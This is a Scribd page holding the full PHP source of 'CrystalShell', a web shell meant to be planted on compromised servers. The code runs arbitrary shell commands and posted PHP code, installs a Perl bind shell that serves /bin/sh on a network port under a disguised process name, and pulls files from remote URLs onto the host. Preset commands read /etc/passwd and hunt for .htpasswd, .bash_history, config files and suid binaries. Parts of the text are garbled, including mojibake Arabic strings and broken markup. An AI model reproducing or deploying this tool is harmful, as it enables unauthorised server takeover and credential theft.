Scribd Logo
Загрузить

Добро пожаловать в Scribd!

  • C 99

    Загружено:

    Amine Mohamad Yebedri
    49 просмотров53 страницы

    Оригинальное название

    c99

    Авторское право

    © Attribution Non-Commercial (BY-NC)

    Доступные форматы

    TXT, PDF, TXT или читайте онлайн в Scribd

    Этот документ был вам полезен?

    Это неприемлемый материал?

    Пожаловаться на этот документ

    Авторское право:

    Attribution Non-Commercial (BY-NC)
    Скачайте в формате TXT, PDF, TXT или читайте онлайн в Scribd
    Отметить как неприемлемый контент
    49 просмотров53 страницы

    C 99

    Загружено:

    Amine Mohamad Yebedri

    Авторское право:

    Attribution Non-Commercial (BY-NC)
    Скачайте в формате TXT, PDF, TXT или читайте онлайн в Scribd
    Отметить как неприемлемый контент
    из 53

    <? error_reporting(5); @ignore_user_abort(true); @set_magic_quotes_runtime(0); $win = strtolower(substr(PHP_OS, 0, 3)) == "win"; /**********************************************************/ /* Crystal <?

    error_reporting(5); @ignore_user_abort(true); @set_magic_quotes_runtime(0); $win = strtolower(substr(PHP_OS, 0, 3)) == "win"; /**********************************************************/ /* CrystalShell v.1 /* --------- ---------/* /* /* /* /* Coded by : Super-Crystal --=SAUDI ARABIC=------------------------------------------------Arab Security Center Team <---thanks mail : sup3r-hackers@hotmail.Com

    /* october73 shell & CrystalShell < coding by super crystal /* /*********************************************************/ ?> <?$dir=realpath("./")."/"; $dir=str_replace("\\","/",$dir); ?> <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title> Crystal shell</title> <style> td { font-family: verdana, arial, ms sans serif, sans-serif; font-size: 11px; color: #D5ECF9; } BODY { margin-top: 4px; margin-right: 4px; margin-bottom: 4px; margin-left: 4px; scrollbar-face-color: #b6b5b5; scrollbar-highlight-color: #758393; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color: #101842; scrollbar-shadow-color: #ffffff; scrollbar-arrow-color: #000000; scrollbar-track-color: #ffffff; } A:link {COLOR:blue; TEXT-DECORATION: none} A:visited { COLOR:blue; TEXT-DECORATION: none} A:active {COLOR:blue; TEXT-DECORATION: none} A:hover {color:red;TEXT-DECORATION: none}

    input, textarea, select { background-color: #EBEAEA; border-style: solid; border-width: 1px; font-family: verdana, arial, sans-serif; font-size: 11px; color: #333333; padding: 0px; } </style></head> <BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF"> <center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr> <th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000"> <p align="center">&nbsp;</p> <p align="center"> <a bookmark="minipanel"> <font face="Webdings" size="7" color="#DCE7EF">?</font></a><font size="7" face="Martina">CRYSTAL-H</font><span lang="en-us"><font size="3" face="Martina"> </font> <font size="1" face="Arial">Crystal hack shellphp</font></span><font color="#FFFF00" face="Arial" size="1">&nbsp;<span lang="en-us">2006-2007</span></font></p> ; </p> <a bookmark="minipanel"> <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr> <p align="center"> <b> <? $dirfile="$file_to_download"; if (file_exists("$dirfile")) { header("location: $dirfile"); } if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = "<font color=\"red\">ON (secure)</font>"; } // PHPINFO if ($_GET['action'] == "phpinfo") {

    echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() b&#7883; c&#7845;m"; exit; } else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";} echo("Safe-mode: $hsafemode"); $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";} else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";} echo("<br>"); echo("Open base dir: $hopenbasedir"); echo("<br>"); echo "PostgreSQL: <b>"; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} echo("<br>"); echo "MSSQL: <b>"; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} echo("<br>"); echo "MySQL: <b>"; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } echo("<br>"); echo "PHP version: <b>".@phpversion()."</b>"; echo("<br>"); echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><fo nt color=red>OFF</font></b>")); echo("<br>"); echo "Disable functions : <b>"; if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = @round(100/($all/$free),2); ?> </b></p> <p align="center">&nbsp;</p></td></tr>

    </table> <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr> <b> </b></p> <p align="center">&nbsp;</p></td></tr> </table> </a>

    </p> <p align="center"><font color="#FFFF00">&nbsp;</font></p> <p align="center"></p> </th></tr><tr> <td bgcolor="#000000" style="color: #DCE7EF"> <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"> <font size="4px"> <b> <font size="1" face="Verdana" color="#DCE7EF">OS:</font><font color="#DCE7EF" size="-2" face="verdana"><font size="1" face="Arial">&nbsp;<?php echo php_uname(); ?>&nbsp;</font></span></font></b><p& gt; <font size="1" face="Verdana" color="#DCE7EF">Server:</font><font color="#DCE7EF" size="1" face="Arial">&nbsp;</font><font color="#DCE7EF" size="1" face="Arial"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?>&nbsp;</font></font> </font> </p> </font> <font size=1 face=Verdana> <p><font color="#DCE7EF">User</font></font><font size="1" face="Verdana" color="#DCE7EF">:</font><font size=-2 face=verdana color="#00000"> </font> </b> </font> </font> <a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"> <font size=-2 face=verdana color="#FFFFFF"> <? passthru("id");?></font><font size=-2 face=verdana color="black"><br> </font>

    <font size=-2 face=Verdana color="#DCE7EF"> pwd</font><font size="-2" face="verdana"><font size=-2 face=Verdana color="#DCE7EF">:</font><font size=-2 face=verdana color="#DCE7EF"> <? echo getcwd();?></div></font></font></a></fon t></b></a></font><br><br>&nbsp;&l t;font size="4px"><b><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color="#FF0000" face="Verdana" size="-2"> &nbsp;</font><font size=-2 face=verdana color=white><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">[</font></a></font><font size=-2 face=verdana></a><font face="Verdana" size="-2">&nbsp;</font></font><font size=-2 face=verdana color=white><a href=# onClick=location.href="javascript:history.back(-1)" style="color: white; text-decoration: none"><font face=Verdana><font color="#CC0000" size="1">Back</font><font color="#DCE7EF" size="1"> </font> </font> <font size="4px"> <a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"> <font color=#DCE7EF size="-2" face="verdana">]</font></a></font></ font><font face=Verdana><font size=-2 face=verdana>&nbsp;</font><font size=-2 face=verdana color=white><font color="#FF0000" face="Verdana" size="-2">&nbsp;</font><font size="4px"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">[ </font> <font size=-2 face=verdana color=white> <a href=?action=phpinfo target=\"_blank\" style="color: white; text-decoration: none"> <font color="#CC0000"> phpinfo</font></a></font></font></font&g t;<font size="4px"><font size=-2 face=verdana> </font> <font color=white size="-2" face="verdana">]</font></font></font>&l t;/b><font size=-2 face=verdana color=white></a><font color="#FF0000" face="Verdana" size="-2">&nbsp;</font></font><b>&l t;font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana;

    text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">[ </font> <a href="?act=tools"><span lang="en-us"><font color=#CC0000 size="-2">Tools</font></span></a></a ></font></b></font><b><font face=Verdana size="4px"><font size=-2 face=verdana> </font> <font color=white size="-2" face="verdana">]</font></font></b><f ont size="4px"><font size=-2 face=verdana color=white></a><font color="#FF0000" face="Verdana" size="-2">&nbsp;</font></font></font&g t;<font size=-2 face=verdana color=white></a></font><font size="4px"><font size=-2 face=verdana color=white><font color="#FF0000" face="Verdana" size="-2">&nbsp;</font></font></font&g t;<font size=-2 face=verdana color=white></a><span lang="en-us"> </span></font><font size="4px"><font size=-2 face=verdana color=white><font size="4px" face="Verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">[</font></a></font><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font face="Webdings" color="#DCE7EF">j</font></a><font color=#CC0000 face="Verdana" size="-2"> </font> <font size="4px"> <font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"> <font size=-2 face=verdana color=#CC0000>server </font> <font size="1" face="verdana" color="#CC0000">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_NAME; ?> </font></a></font> </a></font> </font><b> <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"> <font color=#DCE7EF size="-2" face="verdana">]&nbsp; </font> <font size=-2 face=verdana color=white> <font size="4px" face="verdana" color="white"> <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">

    <font face=Verdana size=-2 color="#008000"> CGI v</font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $GATEWAY_INTERFACE; ?>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;& nbsp;&nbsp; </font> <font face=Verdana size=-2 color="#008000">&nbsp;HTTP v</font></a></font><font size="1" face="verdana">:</font><font size="4px" face="verdana" color="DCE7EF"><font face=Verdana size=-2> <?php echo $SERVER_PROTOCOL; ?></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font face=Verdana size=-2><font size=-2 face=verdana color=#DCE7EF>&nbsp;</font><font size=-2 face=verdana color=#008000>Mail admin</font></font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADMIN; ?>&nbsp;&nbsp;&nbsp;&nbsp; </font><font face=Verdana size=-2 color="black"> &nbsp; </font></a></font> </font> </b> </font></a>&nbsp;&nbsp;<br> <font size="4px"> <b> <font size=-2 face=verdana color=white> <font face=Verdana size=-2 color="#CC0000"> <a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"> <font face="Wingdings" size="3" color="#000000">:</font></a></font>< font size=-2 face=verdana color=#CC0000>&nbsp;&nbsp;</font><font face="Verdana" size="-2" color="#CC0000">IP</font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px" face="verdana" color="white"><font face=Verdana size=-2> </font><font size="1" face="verdana">&nbsp;</font></font><fo nt size="1" face="verdana" color="#CC0000">SERVER:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADDR; ?> </font> </a> <font size="4px"> </a> <font size=-2 face=verdana color=white>

    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb sp;&nbsp; </font></font> <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"> <font size="4px"><font face=Verdana size=-2 color="black">&nbsp;&nbsp;&nbsp;&nbsp;&am p;nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&am p;nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font> <font size="4px" face="verdana" color="white"><font face=Verdana size=-2 color="#008000"> port </font><font size="1" face="verdana" color="#000000">:</font><font face=Verdana size=-2 color="red"> <?php echo $SERVER_PORT; ?> </font></font> </font> </font> </b> </font></p></td></tr></table><br> ; <TABLE style="BORDER-COLLAPSE: collapse; color:#000000" cellSpacing=0 borderColorDark=#DCE7EF cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#C0C0C0 border=1><tr> <td width="100%" valign="top" style="color: #00000" bgcolor="#000000"> <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"> <TABLE style="BORDER-COLLAPSE: collapse; font-family:Verdana; font-size:11px; color:#000000; background-color:#0000000" height=1 cellSpacing=0 borderColorDark=#000000 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#DCE7EF border=1> <tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000"> <td width="990" height="1" valign="top" style="border:1px solid #00000; font-family: Verdana; color: #000000; font-size: 11px; "><p align="center"> &nbsp; </p> <p align="center">&nbsp;<table style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000"> <tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000"> <td style="font-size: 13px; font-family: verdana, arial, helvetica; color: red; background-color: #0000000"> <? if ($act == "tools") echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">

    File to edit: <input type=\"text\" name=\"editfile\" > <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\"> <INPUT type=\"submit\" value=\"Edit\"></form></div>"; ?> <? if ($act == "tools") echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\"> <table id=tb><tr><td> <INPUT type=\"hidden\" name=\"php\" value=\"yes\"> <INPUT type=\"submit\" value=\"eval code\" id=input></form></div></td></table>"; ?> <? if ($act == "tools") echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\"> <b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"> <b>Port</b><input type=\"text\" name=\"port\" value=\"3333\"> <INPUT type=\"hidden\" name=\"installbind\" value=\"yes\"> <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"> <INPUT type=\"submit\" value=\"Connect\"></form></div>"; ?> <? if ($act == "tools") echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\"> <table id=tb><tr><td>Download here <b>from</b>: <INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\"> <b>into:</b> <INPUT type=\"text\" name=\"fileto\" size=30> <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td> <INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div& gt;"; ?> <? if ($act == "tools") echo " <form action=\"$REQUEST_URI\" method=\"POST\"> <table id=tb><tr><td>???

    C?C?C??:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table> "; ?> <?php @$dir = $_POST['dir']; $dir = stripslashes($dir); @$cmd = $_POST['cmd']; $cmd = stripslashes($cmd); $REQUEST_URI = $_SERVER['REQUEST_URI']; $dires = ''; $files = '';

    if (isset($_POST['port'])){ $bind = " #!/usr/bin/perl \$port = {$_POST['port']}; \$port = \$ARGV[0] if \$ARGV[0]; exit if fork; $0 = \"updatedb\" . \" \" x100; \$SIG{CHLD} = 'IGNORE'; use Socket; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in(\$port, INADDR_ANY)); listen(S, 50); while(1) { accept(X, S); unless(fork) { open STDIN, \"<&X\"; open STDOUT, \">&X\"; open STDERR, \">&X\"; close X; exec(\"/bin/sh\"); } close X; } ";} function decode($buffer){ return convert_cyr_string ($buffer, 'd', 'w'); }

    function execute($com) {

    if (!empty($com)) { if(function_exists('exec')) { exec($com,$arr); echo implode(' ',$arr); } elseif(function_exists('shell_exec')) { echo shell_exec($com); } elseif(function_exists('system')) { echo system($com); } elseif(function_exists('passthru')) { echo passthru($com); } } } function perms($mode) { if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'],

    $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); }

    if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "") { copy($HTTP_POST_FILES["userfile"]["tmp_name"],$H TTP_POST_FILES["userfile"]["name"]); } if((isset($_POST['fileto'])) (isset($_POST['filefrom']))) { $data = implode("", file($_POST['filefrom'])); $fp = fopen($_POST['fileto'], "wb"); fputs($fp, $data); $ok = fclose($fp); if($ok) { $size = filesize($_POST['fileto'])/1024; $sizef = sprintf("%.2f", $size); print "<center><div id=logostrip>Download - OK. (".$sizef."?)</div></center>" ; } else { print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>"; } } if (isset($_POST['installbind'])){ if (is_dir($_POST['installpath']) == true){ chdir($_POST['installpath']); $_POST['installpath'] = "temp.pl";} $fp = fopen($_POST['installpath'], "w"); fwrite($fp, $bind); fclose($fp); exec("perl " . $_POST['installpath']); chdir($dir); } @$ef = stripslashes($_POST['editfile']); if ($ef){

    $fp = fopen($ef, "r"); $filearr = file($ef);

    $string = ''; $content = ''; foreach ($filearr as $string){ $string = str_replace("<" , "&lt;" , $string); $string = str_replace(">" , "&gt;" , $string); $content = $content . $string; } echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea> <input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\"> <input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br> <input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>"; fclose($fp); } if(isset($_POST['savefile'])){ $fp = fopen($_POST['savefile'], "w"); $content = stripslashes($content); fwrite($fp, $content); fclose($fp); echo "<center><div id=logostrip>saved -OK!</div></center>"; } if (isset($_POST['php'])){ echo "<center><div id=logostrip>eval code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br> <input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>"; }

    if(isset($_POST['phpcode'])){ echo "<center><div id=logostrip>Results of PHP execution<br><br>"; @eval(stripslashes($_POST['phpcode'])); echo "</div></center>";

    } if ($cmd){ if($sertype == "winda"){ ob_start(); execute($cmd); $buffer = ""; $buffer = ob_get_contents(); ob_end_clean(); } else{ ob_start(); echo decode(execute($cmd)); $buffer = ""; $buffer = ob_get_contents(); ob_end_clean(); } if (trim($buffer)){ echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>"; echo decode($buffer); echo "</textarea></center></div>"; } } $arr = array(); $arr = array_merge($arr, glob("*")); $arr = array_merge($arr, glob(".*")); $arr = array_merge($arr, glob("*.*")); $arr = array_unique($arr); sort($arr); echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td>< ;td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>"; foreach ($arr as $filename) { if ($filename != "." and $filename != ".."){ if (is_dir($filename) == true){ $directory = ""; $directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M

    Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename)); if (is_writable($filename) == true){ $directory = $directory . "<td>Yes</td>";} else{ $directory = $directory . "<td>No</td>"; } if (is_readable($filename) == true){ $directory = $directory . "<td>Yes</td>";} else{ $directory = $directory . "<td>No</td>"; } $dires = $dires . $directory; } if (is_file($filename) == true){ $file = ""; $file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>&q uot; . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename)); if (is_writable($filename) == true){ $file = $file . "<td>Yes</td>";} else{ $file = $file . "<td>No</td>"; } if (is_readable($filename) == true){ $file = $file . "<td>Yes</td></td></tr>";} else{ $file = $file . "<td>No</td></td></tr>"; } $files = $files . $file; }

    } echo $dires; echo $files; echo "</table><br>";

    echo " <form action=\"$REQUEST_URI\" method=\"POST\">

    <table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\""; echo getcwd(); echo "\"> <INPUT type=\"submit\" value=\"Exec\" id=input></td></tr></table></form>";

    ?> </td></tr></table></p></td></tr> </table> </a><br><hr size="1" noshade><p align="right"> <font face="Wingdings 3" size="5" color="#DCE7EF">&lt;</font><b><select name="act"><option value="ls"> With selected:</option><option value="delete">Delete</option><option value="archive"> Archive</option><option value="cut">Cut</option><option value="copy">Copy</option><option value="unselect"> Unselect</option></select>&nbsp;<input type="submit" value="Confirm"></p></form></td></tr ></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td width="100%" height="1" valign="top" colspan="2" bgcolor="#000000"><p align="center"> <b> :: </b> <font face=Verdana size=-2><a href="?act=command">Executed command</a></font><b> ::</b></p></td></tr> <tr><td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000; border: 1px solid #000000"><center><b> <? echo " <form action=\"$REQUEST_URI\" method=\"POST\"> Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">"; ?> <input type="submit" name="submit1" value="Command" style="border: 1px solid #000000"><font face="Wingdings 3"

    color="#DCE7EF" size="3">f</font></form><p> &nbsp;</p> </td> <td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000"><center> <form action="?act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="c:/appserv/www/shells/"> <font color="#DCE7EF">Select</font><font face="Wingdings 3" color="#DCE7EF" size="3">g</font><select name="cmd" size="1"><option value="ls -la"> -----------------------------------------------------------</op tion> <option value="ls -la /var/lib/mysq">ls MySQL</option> <option value="which curl">cURL ?</option> <option value="which wget">Wget ?</option> <option value="which lynx">Lynx ?</option> <option value="which links">links ?</option> <option value="which fetch">fetch ?</option> <option value="which GET">GET ?</option> <option value="which per">Perl ?</option> <option value="gcc --help">C gcc Help ?</option> <option value="tar --help">tar Help ?</option> <option value="cat /etc/passwd">Get passwd !!!</option> <option value="cat /etc/hosts">Get hosts</option> <option value="perl --help">Perl Help ?</option> <option value="find / -type f -perm -04000 -ls"> find all suid files</option><option value="find . -type f -perm -04000 -ls"> find suid files in current dir</option><option value="find / -type f -perm -02000 -ls"> find all sgid files</option><option value="find . -type f -perm -02000 -ls"> find sgid files in current dir</option><option value="find / -type f -name config.inc.php"> find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;"> find config* files</option><option value="find . -type f -name &quot;config*&quot;"> find config* files in current dir</option><option value="find / -perm -2 -ls"> find all writable directories and files</option><option value="find . -perm -2 -ls"> find all writable directories and files in current dir</option><option value="find / -type f -name service.pwd"> find all service.pwd files</option><option value="find . -type f -name service.pwd"> find service.pwd files in current dir</option><option

    value="find / -type f -name .htpasswd"> find all .htpasswd files</option><option value="find . -type f -name .htpasswd"> find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history"> find all .bash_history files</option><option value="find . -type f -name .bash_history"> find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc"> find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc"> find .fetchmailrc files in current dir</option><option value="lsattr -va"> list file attributes on a Linux second extended file system</option><option value="netstat -an grep -i listen"> show opened ports</option></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute" style="border: 1px solid #000000"></form></td></tr> </TABLE> <font face="Verdana" size="-2"><a href="?act=bind">Bind port to</a></font><a bookmark="minipanel"><font face="Webdings" size="5" color="#DCE7EF">A</font></a><font color="#00FF00"><br> </font> <a bookmark="minipanel"> <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr> <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><form method="POST"> <p align="center"> <b><font face="verdana" color="red" size="4"> <a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"> <font face="verdana" size="-2" color="#DCE7EF">::</font></a></font>< ;/b><a href="?act=edit" bookmark="minipanel"><span lang="en-us"><font face="Verdana" size="3">Edit/Create file</font></span></a><b><font face="verdana" color="red" size="4"><a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"><font face="verdana" size="-2" color="#DCE7EF">::</font></a></font>< ;/b><font face="Wingdings 2" size="5">&quot;</font></p> <p align="center"> &nbsp;<?

    if ($act == "edit") {echo "<center><b>C?E??&i acute;? ?C?C?OC?:<br> ;<br> ?? E??? C?? C???? C??? E??I E????? ???<br>?E?I ?C?? C??U? ??? config.php ?EC?<br>Edit<br>?E& Ugrave;?? ?? ?C??? E?C ??E??CE C???? <br>?C??C ? C?C C?IE C?OC? ??? ??? ?? C??? ?? C?C?EICI <br>?E?I ?C?? C?EE ?CE??I washer-crystal.txt </a>.</b>";} ?></p> <p>&nbsp;</p> <p> <? echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\"> File to edit: <input type=\"text\" name=\"editfile\" > <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\"> <INPUT type=\"submit\" value=\"Edit\"></form></div>"; ?> </p> </form></center></p></td> <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center"><b> :: </b><a href="?act=upload"><span lang="en-us"><font face="Verdana" size="3"> upload</font></span></a><b>::</b>< a bookmark="minipanel" href="?act=uploads"><font face=Webdings size=5>&#325;</font></a><center> <a bookmark="minipanel" href="?act=uploads"> </a> </a><p align="center"> <?

    if ($act == "upload") {echo "<center><b>??? C????CE:<br>< br>?? EE?I?I C???? C???CI ???? <br>?E?I ?C?? ?? EC??U? ??? C?I?C? C?????<br>UPLOAD< </a>.</b>";} ?><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="miniform" value="1"><input type="hidden" name="act" value="upload">&nbsp; <? echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\"> <INPUT type=\"file\" name=\"userfile\"> <INPUT type=\"hidden\" name=\"post\" value=\"yes\"> <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"> <INPUT type=\"submit\" value=\"Download\"></form></div>"; ?> <p></form></p></td> <? echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\"> <b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"> <b>Port</b><input type=\"text\" name=\"port\" value=\"3333\"> <INPUT type=\"hidden\" name=\"installbind\" value=\"yes\"> <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"> <INPUT type=\"submit\" value=\"Connect\"></form></div>"; ?> <? if ($act == "command") {echo "<center><b>CRYSTAL-H:<br><br>?&At ilde;IE?C? C?C?C?? C??C??? Select -----x C?U? ??? C?I?C?<br>.?C?C C?IE ?ECE?

